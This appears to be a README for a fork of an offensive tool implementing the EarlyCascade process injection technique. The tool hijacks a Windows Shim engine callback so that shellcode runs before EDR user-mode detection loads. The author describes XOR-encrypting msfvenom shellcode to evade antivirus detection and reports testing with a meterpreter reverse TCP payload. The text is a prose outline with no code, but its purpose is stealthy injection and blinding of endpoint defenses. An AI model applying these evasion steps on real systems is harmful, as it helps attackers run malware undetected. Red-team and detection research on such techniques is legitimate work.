It's a modern and stealthy process injection technique was discovered by Outflank that involves injecting and executing code in the early stages of process creation before loading EDRs for their user mode detection measures. EarlyCascade technique forces enabling the Shim engine, allowing to hijack a Shim engine callback.
The original Code by 0xNinjaCyclone had hardcoded Injection Process Name and static plain Shellcode. I wanted to load dynamic Shellcode from files into a process of my choice. To get rid of plain msfvenom shellcode detections by several AVs I made a basic XOR Encryption of the embedded shellcode. I also made a Visual Studio 2022 Template, ready to compile and run. Did not yet find the problem why not msfvenom shellcode crashes the hosting payload process. So just use msfvenom SC for now. I successfully tested with meterpreter_reverse_tcp
(Original Readme from here)
- Creating a process in suspended mode.
- Dynamically locating the addresses of enabling flag and callback.
- Remotely allocating memory for our stub and shellcode.
- Injecting the stub and shellcode into the target process.
- Force the shim engine to be enabled.
- Hijacking a shim engine callback.
- Triggering the callback by resuming the process thread.
At this point, the stub gets executed, and does the following:
- Disrupting the initialization of detection measures.
- Disabling the Shim engine to avoid crash.
- Queuing an Asynchronous Procedure Call (APC) that executes the shellcode later.